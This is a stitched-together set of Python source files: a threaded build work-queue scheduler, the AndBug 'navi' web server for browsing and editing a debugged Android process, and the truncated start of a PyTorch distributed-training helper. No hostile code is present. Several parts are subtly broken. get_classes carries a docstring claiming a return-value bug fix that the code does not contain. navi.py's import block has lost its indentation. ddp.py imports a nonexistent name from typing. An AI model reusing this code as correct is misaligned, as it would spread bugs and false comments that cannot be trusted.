        """Make the current command execute after command n
        @type n: L{command_t}
        @param n: another (earlier) command
        """
        if isinstance(n, list):
            for x in n:
                self.before_me.append(x)
                x.after_me.append(self)
        else:
            self.before_me.append(n)
            n.after_me.append(self)

    def add_after_me(self, n):
        """Make the current command execute before command n.
        @type n: L{command_t}
        @param n: another (later) command
        """
        if isinstance(n, list):
            for x in n:
                self.after_me.append(x)
                x.before_me.append(self)
        else:
            self.after_me.append(n)
            n.before_me.append(self)

    def _check_afters(self):
        """Return a list of after nodes that are as-yet not submitted
        but now ready"""
        ready = []
        for x in self.after_me:
            if not x.submitted and x._ready():
                ready.append(x)
        return ready

    def elapsed_time(self):
        """Return the elapsed time as a number of seconds"""
        if self.end_time is None:
            self.end_time = get_time()
        return self.end_time - self.start_time

    def elapsed(self):
        """Return the elapsed time.
        @rtype: string
        @returns: the elapsed wall clock time of execution.
        """
        if self.end_time is None:
            self.end_time = get_time()
        elapsed = get_elapsed_time(self.start_time, self.end_time)
        return elapsed

    def dump_cmd(self):
        """Short printable form of the command list."""
        return self._pretty_cmd_str()

    def stderr_exists(self):
        """True if any non-empty stderr text was captured."""
        if self.stderr and len(self.stderr) > 0:
            if len(self.stderr) == 1 and len(self.stderr[0]) == 0:
                return False
            return True
        return False

    def stdout_exists(self):
        """True if any non-empty stdout text was captured."""
        if self.output and len(self.output) > 0:
            if len(self.output) == 1 and len(self.output[0]) == 0:
                return False
            return True
        return False

    def _pretty_cmd_str(self):
        # render each sub-command; python functions show their name
        s = []
        for cmd in self.command:
            if isinstance(cmd, types.FunctionType):
                s.append("PYTHON FN: " + cmd.__name__)
            elif is_stringish(cmd):
                s.append(cmd)
            else:
                s.append(str(cmd))
        return " ;;;; ".join(s)

    def dump(self, tab_output=False, show_output=True):
        """Render a multi-line report of the command, its settings and
        (optionally) its captured output.
        @rtype: string
        """
        s = []
        nl = '\n'
        if verbose(1):
            pass
        elif self.failed():
            pass
        elif self.targets:
            s.append(bracket('TARGET ', " ".join(self.targets)))
            s.append(nl)
        if self.name:
            s.append(bracket('NAME ', self.name))
            s.append(nl)
        if self.command:
            s.append(bracket('COMMAND ', self._pretty_cmd_str()))
            s.append(nl)
        else:
            s.append(bracket('COMMAND ', 'none'))
            s.append(nl)
        if self.args:
            args_string = str(self.args)
            # clip very long argument dumps
            print_limit = 400
            if len(args_string) > print_limit:
                args_string = args_string[:print_limit]
            s.append(bracket('ARGS ', args_string))
            s.append(nl)
        if self.xenv:
            s.append(bracket('ENV ', 'some env'))
            s.append(nl)
        #if self.submitted:
        #    s.append(bracket('START_TIME ', self.start_time))
        #    s.append(nl)
        if self.input_file_name:
            s.append(bracket('INPUT_FILE ', self.input_file_name))
            s.append(nl)
        if self.completed or self.failed():
            if self.exit_status != 0:
                s.append(bracket('EXIT_STATUS ', str(self.exit_status)))
                s.append(nl)
            if self.elapsed_time() > 1:
                s.append(bracket('ELAPSED_TIME', self.elapsed()))
                s.append(nl)
        if self.input_file_name:
            s.append(bracket('INPUT FILE', self.input_file_name))
            s.append(nl)
        if self.output_file_name:
            s.append(bracket('OUTPUT FILE', self.output_file_name))
            s.append(nl)
        # stdout and stderr frequently have unicode
        s = ensure_string(s)
        if self.unbufferred == False and self.output_file_name is None:
            if show_output and self.show_output and self.stdout_exists():
                uappend(s, bracket('OUTPUT'))
                uappend(s, nl)
                for line in self.output:
                    if tab_output:
                        uappend(s, '\t')
                    uappend(s, line)
            if show_output and self.show_output and self.stderr_exists():
                uappend(s, bracket('STDERR'))
                uappend(s, nl)
                for line in self.stderr:
                    if tab_output:
                        uappend(s, '\t')
                    uappend(s, line)
        return u"".join(s)

    def __str__(self):
        return self.dump()

    def _extend_output(self, lines):
        # accumulate stdout lines (strings or lists of strings)
        if lines:
            util_add_to_list(self.output, ensure_string(lines))

    def _extend_stderr(self, lines):
        # accumulate stderr lines (strings or lists of strings)
        if lines:
            util_add_to_list(self.stderr, ensure_string(lines))

    def _extend_output_stderr(self, output, stderr):
        self._extend_output(output)
        self._extend_stderr(stderr)

    def execute(self):
        """Execute the command whether it be a python function or a
        command string. This is executed by worker threads but is made
        available here for potential debugging. Record execution exit/return
        status and output.

        Sets the exit_status, output and stderr error fields of the
        command object.
        """
        self.executed = True
        self.start_time = get_time()
        self.output = []
        self.stderr = []
        for cmd in self.command:
            try:
                if isinstance(cmd, dir_cmd_t):
                    # execute dir_cmd_t objects
                    (self.exit_status, output) = cmd.execute(self.args, self.xenv)
                    self._extend_output(output)
                elif isinstance(cmd, types.FunctionType):
                    # execute python functions
                    (self.exit_status, output) = cmd(self.args, self.xenv)
                    self._extend_output(output)
                elif is_stringish(cmd):
                    # execute command strings
                    if self.output_file_name:
                        (self.exit_status, output, stderr) = \
                            run_command_output_file(
                                cmd,
                                self.output_file_name,
                                shell_executable=self.shell_executable,
                                directory=self.directory,
                                osenv=self.osenv,
                                input_file_name=self.input_file_name)
                        self._extend_output_stderr(output, stderr)
                    elif self.unbufferred:
                        (self.exit_status, output, stderr) = \
                            run_command_unbufferred(
                                cmd,
                                shell_executable=self.shell_executable,
                                directory=self.directory,
                                osenv=self.osenv,
                                input_file_name=self.input_file_name)
                        self._extend_output_stderr(output, stderr)
                    else:
                        # timed execution (self.timeout seconds; 0 = no limit)
                        (self.exit_status, output, stderr) = \
                            run_command_timed(
                                cmd,
                                shell_executable=self.shell_executable,
                                directory=self.directory,
                                osenv=self.osenv,
                                seconds=self.timeout,
                                input_file_name=self.input_file_name)
                        self._extend_output_stderr(output, stderr)
                else:
                    self.exit_status = 1
                    self._extend_output("Unhandled command object: " + self.dump())
                # stop if something failed
                if self.exit_status != 0:
                    break
            except Exception as e:
                self.exit_status = 1
                self._extend_stderr(u"Execution error for: %s\n%s" % (ustr(e), self.dump()))
                break
        self.end_time = get_time()
def _worker_one_task(incoming, outgoing):
    """Pull one command off *incoming*, run it, and report it on
    *outgoing*.  Returns False when a terminator command is seen,
    True otherwise."""
    task = incoming.get()
    if task.terminator:
        # forward the terminator so the controller can observe the shutdown
        outgoing.put(task)
        return False
    task.execute()
    incoming.task_done()
    outgoing.put(task)
    return True
def _worker(incoming, outgoing):
    """Worker-thread main loop: process tasks from *incoming* onto
    *outgoing* until a terminator command arrives."""
    while _worker_one_task(incoming, outgoing):
        pass
class work_queue_t(object):
    """This stores the threads and controls their execution"""

    def __init__(self, max_parallelism=4):
        """
        @type max_parallelism: int
        @param max_parallelism: the number of worker threads to start
        """
        max_parallelism = int(max_parallelism)
        if max_parallelism <= 0:
            die("Bad value for --jobs option: " + str(max_parallelism))
        self.max_parallelism = max_parallelism
        self.use_threads = True
        self.threads = []
        # worker threads can add stuff to the new_queue so we
        # use an MT-safe queue.
        self.new_queue = queue.Queue(0)
        self.out_queue = queue.Queue(0)
        self.back_queue = queue.Queue(0)
        self.pending_commands = deque()
        # progress-message rate limiting (seconds)
        self.message_delay = 10
        self.min_message_delay = 10
        self.message_delay_delta = 10
        self.job_num = 0
        self.pending = 0
        self._clean_slate()
        if self.use_threads:
            if len(self.threads) == 0:
                self._start_daemons()

    def _empty_queue(self, q):
        # Drain q. Loop on get_nowait() rather than checking empty()
        # first: empty() is racy when worker threads are consumers too.
        while True:
            try:
                q.get_nowait()
            except queue.Empty:
                break

    def _cleanup(self):
        """After a failed build we want to clean up our any in-progress state
        so we can re-use the work queue object"""
        # the new_queue, job_num and pending get updated by add() before we build.
        # so we must clean them up after every build. Also good hygiene to clean out
        # the task queues that we use to talk to the workers.
        self.pending_commands = deque()
        self._empty_queue(self.new_queue)
        self._empty_queue(self.out_queue)
        self._empty_queue(self.back_queue)
        self.job_num = 0
        self.pending = 0

    def _clean_slate(self):
        # reset per-build counters and bookkeeping
        self.running_commands = []
        self.all_commands = []
        self.running = 0
        self.sent = 0
        self.finished = 0
        self.errors = 0
        self.dag = None
        # for message limiting in _status()
        self.last_time = 0
        self.last_pending = 0
        self.last_finished = 0
        self.last_running = 0
        self.start_time = get_time()
        self.end_time = None
        # we set dying to True when we are trying to stop because of an error
        self.dying = False
        self._empty_queue(self.out_queue)
        self._empty_queue(self.back_queue)

    def clear_commands(self):
        """Remove any previously remembered commands"""
        self.all_commands = []

    def commands(self):
        """Return list of all commands involved in last build"""
        return self.all_commands

    def elapsed_time(self):
        """Return the elapsed time as a number"""
        if self.end_time is None:
            self.end_time = get_time()
        return self.end_time - self.start_time

    def elapsed(self):
        """Return the elapsed time as a pretty string
        @rtype: string
        @returns: the elapsed wall clock time of execution.
        """
        if self.end_time is None:
            self.end_time = get_time()
        elapsed = get_elapsed_time(self.start_time, self.end_time)
        return elapsed

    def _terminate(self):
        """Shut everything down. Kill the worker threads if any were
        being used. This is called when the work_queue_t is garbage
        collected, but can be called directly."""
        self.dying = True
        if self.use_threads:
            self._stop_daemons()
            self._join_threads()

    def _start_daemons(self):
        """Start up a bunch of daemon worker threads to process jobs from
        the queue."""
        for i in range(self.max_parallelism):
            t = Thread(target=_worker, args=(self.out_queue, self.back_queue))
            # setDaemon() is deprecated; assign the attribute directly
            t.daemon = True
            t.start()
            self.threads.append(t)

    def _stop_daemons(self):
        """Send terminator objects to all the workers"""
        for i in range(self.max_parallelism):
            t = command_t()
            t.terminator = True
            if verbose(3):
                msgb("SENT TERMINATOR", str(i))
            self._start_a_job(t)

    def _join_threads(self):
        """Use this when not running threads in daemon-mode"""
        for t in self.threads:
            t.join()
            if verbose(3):
                msgb("WORKER THREAD TERMINATED")
        self.threads = []

    def _add_one(self, command):
        """Add a single command of type L{command_t} to the list
        of jobs to run."""
        # FIXME: make this take a string and build a command_t
        if command.completed:
            if verbose(5):
                msgb("SKIPPING COMPLETED CMD", str(command.command))
            self.add(command._check_afters())
            return
        if command.submitted:
            if verbose(5):
                msgb("SKIPPING SUBMITTED CMD", str(command.command))
            return
        command.submitted = True
        if verbose(6):
            msgb("WQ ADDING", str(command.command))
        self.job_num += 1
        self.new_queue.put(command)
        self.pending += 1

    def add_sequential(self, command_strings, unbufferred=False):
        """
        Add a list of command strings as sequential tasks to the work queue.

        @type command_strings: list of strings
        @param command_strings: command strings to add to the L{work_queue_t}
        @rtype: list of L{command_t}
        @return: the commands created
        """
        last_cmd = None
        cmds = []
        for c in command_strings:
            co = command_t(c, unbufferred=unbufferred)
            cmds.append(co)
            self.add(co)
            if last_cmd:
                # chain each command after its predecessor
                last_cmd.add_after_me(co)
            last_cmd = co
        return cmds

    def add(self, command):
        """Add a command or list of commands of type L{command_t}
        to the list of jobs to run.

        @type command: L{command_t}
        @param command: the command to run
        """
        if verbose(5):
            msgb("ADD CMD", str(type(command)))
        if command:
            if isinstance(command, list):
                for c in command:
                    if verbose(5):
                        msgb("ADD CMD", str(type(c)))
                    self._add_one(c)
            else:
                self._add_one(command)

    def _done(self):
        # the build loop stops when nothing is running and (unless we are
        # dying) nothing is pending
        if self.running > 0:
            return False
        if not self.dying and self.pending > 0:
            return False
        return True

    def _status(self):
        """Print a rate-limited one-line progress message."""
        if self.show_progress or verbose(2):
            # (a longer, never-used format string was dead code here; removed)
            s = ('R: %d P: %d C: %d E: %d / %s %s')
            cur_time = get_time()
            changed = False
            if (self.running != self.last_running or
                    self.pending != self.last_pending or
                    self.finished != self.last_finished):
                changed = True
            if (changed or
                    # have we waited sufficiently long?
                    cur_time >= self.last_time + self.message_delay):
                # speed back up when anything finishes
                if self.finished != self.last_finished:
                    self.message_delay = self.min_message_delay
                elif self.last_time != 0:
                    # only printing because of timeout delay, so
                    # we increase the time a little bit.
                    self.message_delay += self.min_message_delay
                # store the other limiters for next time
                self.last_time = cur_time
                self.last_pending = self.pending
                self.last_finished = self.finished
                self.last_running = self.running
                msg(s % (self.running,
                         self.pending,
                         self.finished,
                         self.errors,
                         get_elapsed_time(self.start_time, get_time()),
                         self._command_names()))

    def _start_more_jobs(self):
        """If there are jobs to start and we didn't hit our parallelism
        limit, start more jobs"""
        # copy from new_queue to pending_commands to avoid data
        # race on iterating over pending commands.
        started = False
        while not self.new_queue.empty():
            self.pending_commands.append(self.new_queue.get())
        ready = deque()
        for cmd in self.pending_commands:
            if cmd._ready():
                ready.append(cmd)
        while self.running < self.max_parallelism and ready:
            cmd = ready.popleft()
            # FIXME: small concern that this could be slow
            self.pending_commands.remove(cmd)
            if verbose(2):
                msgb("LAUNCHING", cmd.dump_cmd())
            self._start_a_job(cmd)
            self.pending -= 1
            started = True
        return started

    def _start_a_job(self, cmd):
        """Private function to kick off a command"""
        self.out_queue.put(cmd)
        self.running_commands.append(cmd)
        if not cmd.terminator:
            self.all_commands.append(cmd)
        self.sent += 1
        self.running += 1

    def _command_names(self):
        # short bracketed list of named running jobs for the status line
        s = []
        anonymous_jobs = 0
        for r in self.running_commands:
            if hasattr(r, 'name') and r.name:
                s.append(r.name)
            else:
                anonymous_jobs += 1
        if s:
            if anonymous_jobs:
                s.append('%d-anonymous' % (anonymous_jobs))
            return '[' + ' '.join(s) + ']'
        else:
            return ''

    def _wait_for_jobs(self):
        """Return one command object when it finishes, or None on timeout (or
        other non-keyboard-interrupt exceptions)."""
        if self.running > 0:
            try:
                cmd = self.back_queue.get(block=True, timeout=self.join_timeout)
                self.running -= 1
                self.finished += 1
                self.running_commands.remove(cmd)
                self.back_queue.task_done()
                return cmd
            except queue.Empty:
                return None
            except KeyboardInterrupt:
                msgb('INTERRUPT')
                self._terminate()
                self.dying = True
                sys.exit(1)
                return None  # NOT REACHED
            except Exception:
                # was a bare "except:", which would also swallow SystemExit
                return None
        return None

    def build(self,
              dag=None,
              targets=None,
              die_on_errors=True,
              show_output=True,
              error_limit=0,
              show_progress=False,
              show_errors_only=False,
              join_timeout=10.0):
        """
        This makes the work queue start building stuff. If no targets
        are specified then all the targets are considered and built if
        necessary. All commands that get run or generated are stored in
        the all_commands attribute. That attribute gets re-initialized
        on each call to build.

        @type dag: L{dag_t}
        @param dag: the dependence tree object
        @type targets: list
        @param targets: specific targets to build
        @type die_on_errors: bool
        @param die_on_errors: keep going or die on errors
        @type show_output: bool
        @param show_output: show stdout/stderr (or just buffer it in
        memory for later processing). Setting this to False is good for
        avoiding voluminous screen output. The default is True.
        @type show_progress: bool
        @param show_progress: show the running/pending/completed/errors msgs
        @type show_errors_only: bool
        @param show_errors_only: normally print the commands as they complete.
        If True, only show the commands that fail.
        @type join_timeout: float
        @param join_timeout: how long to wait for thread to terminate. default 10s
        """
        self._clean_slate()
        self.show_progress = show_progress
        self.join_timeout = join_timeout
        self.errors = 0
        self.show_errors_only = show_errors_only
        self.message_delay = self.min_message_delay
        self.last_time = 0
        self.clear_commands()
        self.dag = dag
        if self.dag:
            for x in self.dag._leaves_with_changes(targets):
                self.add(x.creator)
        okay = self._build_blind(die_on_errors, show_output, error_limit)
        if okay and self.dag:
            did_not_build = self.dag.check_for_skipped()
            if len(did_not_build) > 0:
                # some stuff did not build, force an error status return
                msgb("ERROR: DID NOT BUILD SOME STUFF", "\n\t".join(did_not_build))
                if self.dag:
                    uprint(self.dag.dump())
                self.end_time = get_time()
                self._cleanup()
                return False
        # normal exit path
        self.end_time = get_time()
        if self.dag:
            self.dag.dag_write_signatures()
        self._cleanup()
        return okay

    def _build_blind(self, die_on_errors=True, show_output=True, error_limit=0):
        """Start running the commands that are pending and kick off
        dependent jobs as those complete. If die_on_errors is True, the
        default, we stop running new jobs after one job returns a nonzero
        status. Returns True if no errors"""
        if self.use_threads:
            return self._build_blind_threads(die_on_errors,
                                             show_output,
                                             error_limit)
        else:
            return self._build_blind_no_threads(die_on_errors,
                                                show_output,
                                                error_limit)

    def _build_blind_threads(self,
                             die_on_errors=True,
                             show_output=True,
                             error_limit=0):
        """Start running the commands that are pending and kick off
        dependent jobs as those complete. If die_on_errors is True, the
        default, we stop running new jobs after one job returns a nonzero
        status. Returns True if no errors"""
        okay = True
        started = False
        while 1:
            c = None
            if started:
                c = self._wait_for_jobs()
            if c:
                if verbose(3):
                    msgb("JOB COMPLETED")
                if c.failed():
                    self.errors += 1
                    okay = False
                    if die_on_errors or (error_limit != 0 and
                                         self.errors > error_limit):
                        warn("Command execution failed. " +
                             "Waiting for remaining jobs and exiting.")
                        self.dying = True
            if not self.dying:
                started |= self._start_more_jobs()
            self._status()
            if c and not self.dying:
                c._complete()
                # Command objects can depend on each other
                # directly. Enable execution of dependent commands.
                if verbose(3):
                    msgb("ADD CMD-AFTERS")
                self.add(c._check_afters())
                # Or we might find new commands from the file DAG.
                if self.dag:
                    for x in self.dag._enable_successors(c):
                        self.add(x.creator)
            if c:
                if self.show_errors_only == False or c.failed():
                    uprint(c.dump(show_output=show_output))
                elif c.targets:
                    for x in c.targets:
                        uprint(u'\tBUILT: {}'.format(x))
            if self._done():
                break
        return okay

    def _build_blind_no_threads(self, die_on_errors=True,
                                show_output=True, error_limit=0):
        """Start running the commands that are pending and kick off
        dependent jobs as those complete. If die_on_errors is True, the
        default, we stop running new jobs after one job returns a nonzero
        status. Returns True if no errors"""
        okay = True
        while 1:
            started = False
            if not self.dying:
                started = self._start_more_jobs()
            if started:
                self._status()
            # EXECUTE THE TASK OURSELVES
            if self.running > 0:
                _worker_one_task(self.out_queue, self.back_queue)
            c = self._wait_for_jobs()
            if c:
                if verbose(3):
                    msgb("JOB COMPLETED")
                if c.failed():
                    okay = False
                    self.errors += 1
                    if die_on_errors or (error_limit != 0 and
                                         self.errors > error_limit):
                        warn("Command execution failed. " +
                             "Waiting for remaining jobs and exiting.")
                        self.dying = True
                if not self.dying:
                    c._complete()
                    # Command objects can depend on each other
                    # directly. Enable execution of dependent commands.
                    if verbose(3):
                        msgb("ADD CMD-AFTERS")
                    self.add(c._check_afters())
                    # Or we might find new commands from the file DAG.
                    if self.dag:
                        for x in self.dag._enable_successors(c):
                            self.add(x.creator)
                if self.show_errors_only == False or c.failed():
                    uprint(c.dump(show_output=show_output))
            self._status()
            if self._done():
                break
        return okay
|
navi.py | #!/usr/bin/env python
## TODO: expand the forest to use <slot>, <info>, <more>
## TODO: add <value> browser
## TODO: add <value>/<slot> browser.
## TODO: add <array>/<index> browser.
## TODO: add close button to popouts
## TODO: add static class list
import andbug, os.path, json, subprocess, threading
import re
try:
import bottle
except ImportError:
raise andbug.DependencyError('navi requires the "bottle" package')
################################################################### UTILITIES
# These functions make life a little easier, doing things like restructuring
# data structures to be easier to use from templates.
#############################################################################
def index_seq(seq):
    """Yield (index, item) pairs for *seq*.

    Hand-rolled range(len(...)) loop replaced with the builtin, which
    also works for arbitrary iterables."""
    return enumerate(seq)
def get_threads():
    'return a copy of the process thread list, sorted by thread index'
    global proc # set by navi_loop
    threads = proc.threads()[:] # TODO This workaround for view is vulgar.
    def _index(name):
        # thread names look like "<12> ..."; fall back to the raw name
        try:
            return int(re.split('<|>', name)[1])
        except Exception:
            return name
    threads.sort(lambda a, b: cmp(_index(a.name), _index(b.name)))
    return threads
def get_classes():
    """Return a copy of the process class list, sorted by JNI name.

    Bug fix: the original sorted the copy but never returned it, so
    callers always received None."""
    global proc # set by navi_loop
    classes = proc.classes()[:] # TODO This workaround for view is vulgar.
    classes.sort(lambda a, b: cmp(a.jni, b.jni))
    return classes
############################################################## INFO UTILITIES
# These functions summarize various Java objects into human-readable
# representations.
#############################################################################
def thread_info(thread):
    'strip the leading "thread " tag from a thread description'
    text = str(thread)
    if text.startswith('thread '):
        return text[7:]
    return text
def frame_info(frame):
    'keep only the part of a frame description after ", at "'
    parts = str(frame).split( ', at ', 1)
    return parts[1] if len(parts) == 2 else parts[0]
def truncate_ojni(jni):
    'shorten a JNI type name, e.g. "Ljava/lang/String;" -> "j.l.String"'
    if jni.startswith('['):
        # array type: shorten the element type and append []
        return truncate_ojni(jni[1:]) + '[]'
    if jni.startswith('L'):
        # object type: drop the L prefix and trailing semicolon
        jni = jni[1:]
        if jni.endswith(';'):
            jni = jni[:-1]
    parts = jni.split('/')
    if len(parts) == 1:
        return parts[0]
    # abbreviate every package component to its first letter
    initials = '.'.join((p[0] if p else '') for p in parts[:-1])
    return '%s.%s' % (initials, parts[-1])
def object_info(object):
    'render an object reference as "<shortened.jni.Name>"'
    short = truncate_ojni(object.jni)
    return '<%s>' % short
def info(value):
    'produce a short human-readable summary of *value*'
    if isinstance(value, andbug.Thread):
        return thread_info(value)
    if isinstance(value, andbug.Frame):
        return frame_info(value)
    if isinstance(value, andbug.Array) and value.jni in ('[C', '[B'):
        # char/byte arrays render as their repr, minus NUL noise
        return repr(value).replace('\\x00', '') # HACK
    if isinstance(value, andbug.Object):
        return object_info(value)
    return value
############################################################## VIEW UTILITIES
# These functions summarize various Java objects into JSON views suitable for
# navigation panels. Each view comes as a list, consisting of the name of a
# suitable constructor, and a series of arguments for the constructor.
#############################################################################
def sequence_view(value):
    'JSON view of an array: ["seq", jni, item0-info, item1-info, ...]'
    out = ['seq', value.jni]
    out.extend(info(item) for item in value)
    return out
#TODO: slots
def object_view(value):
    'JSON view of an object: ["obj", jni, (field, info, field), ...]'
    out = ['obj', value.jni]
    for field_name, field_val in value.fields.iteritems():
        out.append((field_name, info(field_val), field_name))
    return out
#TODO: slots
def view(value):
    'dispatch to the JSON view builder appropriate for *value*'
    if isinstance(value, andbug.Array):
        return sequence_view(value)
    if isinstance(value, andbug.Object):
        return object_view(value)
    # plain values get wrapped as-is
    return ['val', info(value)]
################################################################## DATA ROOTS
# We use static roots derived from the location of the Navi script.
#############################################################################
# note: __file__ is injected into the module by import
# NAVI_ROOT is the package root, one level above this module
NAVI_ROOT = os.path.abspath(
    os.path.join( os.path.dirname(__file__), '..' )
)
# compiled static assets and coffeescript sources; the trailing ''
# keeps a path separator on the end (resolve_resource relies on it)
STATIC_ROOT = os.path.join( NAVI_ROOT, 'data', '' )
COFFEE_ROOT = os.path.join( NAVI_ROOT, 'coffee', '' )
# make the navi templates visible to bottle
bottle.TEMPLATE_PATH.append( os.path.join( NAVI_ROOT, 'view' ) )
def resolve_resource(root, rsrc):
    'resolve *rsrc* inside *root*, refusing paths that escape the root'
    assert root.endswith(os.path.sep)
    resolved = os.path.abspath(root + rsrc)
    # a ".." in rsrc could escape root; abspath collapses it so a simple
    # prefix check suffices
    if not resolved.startswith(root):
        raise Exception('Less dots next time.')
    return resolved
@bottle.route( '/s/:req#.*#' )
def static_data(req):
    'serve static assets, transparently compiling coffeescript sources'
    src = resolve_resource(COFFEE_ROOT, req)
    if src.endswith('.coffee') and os.path.exists(src):
        # map foo.coffee -> foo.js relative to the static root
        req = src.replace(COFFEE_ROOT, '')[:-7] + '.js'
        try:
            subprocess.call(('coffee', '-o', STATIC_ROOT, '-c', src))
        except OSError:
            # use the cached version, looks like coffee isn't working.
            pass
    return bottle.static_file(req, root=STATIC_ROOT)
################################################################# GLOBAL DATA
# Our Bottle server uses WSGIRef, which is a single-process asynchronous HTTP
# server. Any given request handler can be sure that it has complete control
# of these globals, because WSGIRef is far too stupid to handle multiple
# concurrent requests.
#############################################################################
# version stamp reported by the web UI
NAVI_VERNO = '0.2'
NAVI_VERSION = 'AndBug Navi ' + NAVI_VERNO
################################################################# THREAD AXIS
# The thread axis works from the process's thread list, digging into
# individual thread frames and their associated slots.
#############################################################################
def get_object_item(val, key):
    'fetch object field *key*, translating a miss into an HTTP 404'
    try:
        return val.field(key)
    except KeyError:
        raise bottle.HTTPError(
            code=404, output='object does not have field "%s".' % key
        )
def get_array_item(val, key):
    """Fetch element *key* (an integer index) of *val*, translating a
    miss into an HTTP 404.

    Bug fix: plain sequence indexing raises IndexError, not KeyError,
    for a bad index, so an out-of-range index previously escaped as an
    unhandled 500; both exception types are now mapped to the 404."""
    key = int(key)
    try:
        return val[key]
    except (KeyError, IndexError):
        raise bottle.HTTPError(
            code=404, output='array does not have index %s.' % key
        )
def get_item(val, key):
    'navigate one step into an array or object, or raise an HTTP 404'
    if isinstance(val, andbug.Array):
        return get_array_item(val, key)
    if isinstance(val, andbug.Object):
        return get_object_item(val, key)
    # anything else is a leaf and cannot be navigated into
    raise bottle.HTTPError(
        code=404, output='cannot navigate type %s.' % type(val).__name__
    )
def deref_frame(tid, fid):
    'look up frame *fid* of thread *tid*'
    threads = get_threads()
    frames = tuple(threads[tid].frames)
    return frames[fid]
def deref_value(tid, fid, key, path):
    'resolve slot *key* of a frame, then walk *path* into the value'
    if isinstance(path, basestring):
        path = path.split('/')
    value = deref_frame(tid, fid).value(key)
    while path:
        step, path = path[0], path[1:]
        value = get_item(value, step)
    return value
@bottle.post('/t/:tid/:fid/:key')
@bottle.post('/t/:tid/:fid/:key/:path#.*#')
def change_slot(tid, fid, key, path=None):
    'changes a value in a frame or object'
    try:
        tid, fid, key = int(tid), int(fid), str(key)
        content_type = bottle.request.get_header('Content-Type', '')
        if not content_type.startswith('application/json'):
            return {"error":"new value must be provided as JSON"}
        if path:
            # the last path step names the field; the rest locate the owner
            steps = path.split('/')
            value = deref_value(tid, fid, key, steps[:-1])
            key = steps[-1]
        else:
            value = deref_frame(tid, fid)
        data = bottle.request.json
    except Exception as exc:
        #TODO: indicate that this was a deref error
        #TODO: log all non-HTTP errors to stderr
        return {"error":str(exc)}
    try:
        #if isinstance(value, andbug.Array):
        #    return set_array_item(value, key)
        if isinstance(value, andbug.Object):
            return set_object_field(value, key, data)
        if isinstance(value, andbug.Frame):
            return set_frame_slot(value, key, data)
        return {"error":"navi can only modify object fields and frame slots"}
    except Exception as exc:
        #TODO: indicate that this was an assignment error
        #TODO: log all non-HTTP errors to stderr
        return {"error":str(exc)}
def set_frame_slot(frame, key, data): #TEST
    'changes the value of a frame slot'
    #TODO: make sure frame.setValue throws a KeyError on failed slot update
    try:
        if frame.setValue(key, data):
            return {}
    except KeyError:
        return {"error":"navi cannot find slot %r" % key}
    return {"error":"navi could not change slot %r" % key}
def set_object_field(val, key, value): #TEST
    'changes the value of an object field'
    try:
        if val.setField(key, value):
            return {}
    except KeyError:
        return {"error":"navi cannot find field %r" % key}
    return {"error":"navi could not change field %r" % key}
#def set_array_item(val, key):
# key = int(key)
#
# try:
# return val[key]
# except KeyError:
# raise bottle.HTTPError(
# code=404, output='array does not have index %s.' % key
# )
@bottle.route('/t/:tid/:fid/:key')
@bottle.route('/t/:tid/:fid/:key/:path#.*#')
def view_slot(tid, fid, key, path=None):
    'lists the values in the frame'
    value = deref_value(int(tid), int(fid), str(key), path)
    bottle.response.content_type = 'application/json'
    return json.dumps(view(value))
###################################################### THE THREAD FOREST (TT)
# The thread-forest API produces a JSON summary of the threads and their
# frame stacks. This is consolidated into one data structure to reduce
# round trip latency.
#############################################################################
#TODO: INSULATE
def seq_frame(frame, url):
    'summarize a frame as [info, native, (slot, info, slot-url), ...]'
    if not url.endswith('/'):
        url += '/'
    out = [info(frame), frame.native]
    for slot, val in frame.values.iteritems():
        out.append((slot, info(val), url + slot))
    return out
def seq_thread(thread, url):
    """Summarize *thread* as [info, frame0, frame1, ...], rendering each
    frame with seq_frame under a /t/<tid>/<fid>-style url.

    Idiom fix: range(len(frames)) indexing replaced with enumerate."""
    if not url.endswith('/'):
        url += '/'
    seq = [info(thread)]
    for i, frame in enumerate(thread.frames):
        seq.append(seq_frame(frame, url + str(i)))
    return seq
def seq_process():
    'summarize every thread in the process for the thread forest'
    threads = get_threads()
    return [seq_thread(t, '/t/%s/' % i) for i, t in enumerate(threads)]
@bottle.route('/tt')
def json_process():
    'JSON dump of the whole thread forest'
    bottle.response.content_type = 'application/json'
    return json.dumps(seq_process())
############################################################## FRONT SIDE (/)
# The front-side interface uses the JSON API with jQuery and jQuery UI to
# present a coherent 'one-page' interface to the user; embeds the process
# forest for efficiency.
#############################################################################
@bottle.route('/')
def frontend():
    'render the one-page UI with the thread forest embedded'
    forest = json.dumps(seq_process())
    return bottle.template('frontend', forest=forest)
################################################################### BOOTSTRAP
# Bottle assumes that the server session will dominate the process, and does
# not handle being spun up and down on demand. Navi does not depend heavily
# on Bottle, so this could be decoupled and put under WSGIREF.
#############################################################################
def navi_loop(p, address, port):
    """Run the (blocking) bottle HTTP server for the navi UI.

    ``p`` is published through the module-global ``proc`` because bottle
    route handlers have no direct way to receive it.
    """
    # Look, bottle makes me do sad things..
    global proc
    proc = p
    bottle.debug(True)
    bottle.run(
        host=address,
        port=port,
        reloader=False,  # reloader would re-exec the process; not wanted here
        quiet=True
    )
# Handle to the (single) navigation server thread, if one is running.
svr = None
@andbug.command.action('[allowRemote=<False or anychar>] [port=<8080>]')
def navi(ctxt, allowRemote=False, port=None):
    'starts an http server for browsing process state'
    global svr
    # Only one navigation server per session.
    if svr is not None:
        andbug.screed.section('navigation process already running')
        return
    host = '0.0.0.0' if allowRemote else 'localhost'
    srv_port = int(port) if port else 8080
    with andbug.screed.section(
        'navigating process state at http://localhost:%i' % srv_port
    ):
        andbug.screed.item('Process suspended for navigation.')
        ctxt.sess.suspend()
        svr = threading.Thread(target=lambda: navi_loop(ctxt.sess, host, srv_port))
        svr.daemon = 1 if ctxt.shell else 0
        svr.start()
|
ddp.py | from typing import Callable, cast, Type, T, Tuple, Any
import torch
from time import sleep
from loguru import logger
from functools import wraps
from argparse import Namespace
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.distributed import Backend
from multiprocessing import Process, Queue
from collections import Counter
def spawn(process: Callable, args: Namespace, world_size: int) -> None:
    """Launch ``world_size`` copies of ``process`` via torch.multiprocessing.

    ``mp.spawn`` prepends the process index, so each worker is invoked as
    ``process(rank, args, world_size)``.  Blocks until all workers exit
    (``join=True``).
    """
    mp.spawn(process, args=(args, world_size), nprocs=world_size, join=True)
def is_dist_done_early(cuda_device: torch.device) -> bool:
    """
    Check whether the other workers have stopped already (due to differing amounts of
    data in each). If so, we can't proceed because we would hang when we hit the
    barrier implicit in Model.forward. We use a IntTensor instead a BoolTensor
    here because NCCL process groups apparently don't support BoolTensor.
    """
